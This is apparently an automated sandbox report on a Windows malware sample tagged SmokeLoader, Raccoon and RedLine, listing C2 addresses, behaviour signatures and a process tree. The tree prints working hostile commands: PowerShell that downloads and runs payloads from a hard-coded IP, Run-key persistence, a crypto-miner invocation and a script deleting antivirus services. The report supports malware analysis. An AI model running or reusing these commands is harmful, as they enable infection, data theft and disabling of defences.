Overview

overview

10

Static

static

d4537efd24...99.exe

windows7_x64

10

d4537efd24...99.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    11-08-2021 20:40

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    d4537efd24d9b886648bd32b6ce4da99.exe

  • Size

    207KB

  • MD5

    d4537efd24d9b886648bd32b6ce4da99

  • SHA1

    1a014d098b8ef7ecef5ec124ddef0030c42da509

  • SHA256

    5d372a19bbdae072e4fb4ff9deded30dbb40f4a74b54fbf77888a1523e864129

  • SHA512

    e0db39cd1165f6d34e33f4a31e71a1ff69f48cf3baf291cf873b91954e608b89dd8a89a4f1cafa279936cf22abf4e901290816d649bcbc143e7977618d6e30e4

Score
10/10
raccoonredlinesmokeloader2ca2376c561d1af7f8b9e6f3256b06220a3db187471c70de3b4f9e4d493e418d1f60a90659057de0cd8dc1031358b1aec55cc6bc447df1018b068607backdoordiscoveryevasioninfostealerpersistencespywarestealersuricatathemidatrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

C2

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/
rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes
  • url4cnc

    https://telete.in/johnyes13

rc4.plain
rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes
  • url4cnc

    https://telete.in/p1rosto100xx

rc4.plain
rc4.plain

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
    evasiontrojan
  • Process spawned unexpected child process 5 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Raccoon Stealer Payload 6 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
    evasion
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 60 IoCs
  • Checks BIOS information in registry 2 TTPs 64 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Deletes itself 1 IoCs
  • Drops startup file 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 45 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 23 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
    "C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3492
    • C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe
      "C:\Users\Admin\AppData\Local\Temp\d4537efd24d9b886648bd32b6ce4da99.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:1520
  • C:\Users\Admin\AppData\Local\Temp\ADCA.exe
    C:\Users\Admin\AppData\Local\Temp\ADCA.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:212
    • C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp" /SL5="$40116,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1868
      • C:\Users\Admin\AppData\Local\Temp\ADCA.exe
        "C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:2648
        • C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp
          "C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp" /SL5="$6005E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\ADCA.exe" /VERYSILENT
          4⤵
          • Executes dropped EXE
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2100
          • C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
            "C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Modifies system certificate store
            PID:1816
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3692
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4764
            • C:\ProgramData\Data\install.exe
              "C:\ProgramData\Data\install.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              PID:4784
              • C:\ProgramData\Data\install.exe
                "C:\ProgramData\Data\install.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Drops file in System32 directory
                • Drops file in Program Files directory
                • Drops file in Windows directory
                PID:4812
                • C:\ProgramData\Data\install.exe
                  "C:\ProgramData\Data\install.exe"
                  8⤵
                  • Executes dropped EXE
                  PID:5056
            • C:\ProgramData\Systemd\HostData.exe
              NULL
              6⤵
              • Executes dropped EXE
              PID:4840
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4856
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4908
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4088
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:5080
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4104
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3892
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4216
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2324
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4112
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4308
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2156
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2580
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4368
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:2640
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:3656
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4512
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4552
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4500
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              PID:4620
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:3108
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2892
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4740
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4900
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:5028
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:5096
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4104
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:892
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4476
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4280
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4412
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:3896
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4248
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4180
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:1200
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4128
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2076
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:4284
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:1868
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:852
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2252
            • C:\ProgramData\Data\Database.exe
              -pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password666
              6⤵
              • Executes dropped EXE
              • Checks BIOS information in registry
              • Checks whether UAC is enabled
              PID:2156
  • C:\Users\Admin\AppData\Local\Temp\B702.exe
    C:\Users\Admin\AppData\Local\Temp\B702.exe
    1⤵
    • Executes dropped EXE
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    PID:2084
  • C:\Users\Admin\AppData\Local\Temp\BB97.exe
    C:\Users\Admin\AppData\Local\Temp\BB97.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 868
      2⤵
      • Program crash
      PID:1624
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 908
      2⤵
      • Program crash
      PID:2220
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 924
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3928
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 856
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:3248
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 896
      2⤵
      • Program crash
      • Suspicious use of AdjustPrivilegeToken
      PID:204
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 1808 -s 976
      2⤵
      • Program crash
      PID:208
    • C:\ProgramData\Runtimebroker.exe
      "C:\ProgramData\Runtimebroker.exe"
      2⤵
      • Executes dropped EXE
      • Drops startup file
      PID:3492
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 736
        3⤵
        • Program crash
        PID:2200
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 772
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:2220
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 720
        3⤵
        • Program crash
        PID:2636
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 844
        3⤵
        • Program crash
        PID:3612
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 984
        3⤵
        • Program crash
        • Suspicious use of AdjustPrivilegeToken
        PID:1624
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1012
        3⤵
        • Program crash
        PID:2200
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 3492 -s 1140
        3⤵
        • Program crash
        PID:208
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'
        3⤵
        • Adds Run key to start application
        PID:3904
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method
        3⤵
        • Blocklisted process makes network request
        PID:4244
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell" Get-MpPreference -verbose
          4⤵
            PID:4476
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MSK80Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAPExe" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McBootDelayStartSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mccspsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfefire" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\HomeNetSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ModuleCoreService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McMPFSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mcpltsvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McProxy" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McODS" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfemms" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAfee SiteAdvisor Service" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\mfevtp" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McNaiAnn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\nanosvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\NortonSecurity" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\!SASCORE" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\SBAMSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVAuxSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ZillyaAVCoreSvc" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\QHActiveDefense" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\avast! Firewall" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVG Antivirus" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirMailService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\Avira.ServiceHost" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirWebService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AntiVirSchedulerService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsservppl" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ProductAgentService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\vsserv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\updatesrv" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdAgent" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\cmdvirth" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\DragonUpdater" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\ekrn" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\0247141531883172mcinstcleanup" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\PEFService" /f set "osX=%PROCESSOR_ARCHITECTURE%" if defined PROCESSOR_ARCHITEW6432 set "osX=AMD64" if "%osX%"=="x86" ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" 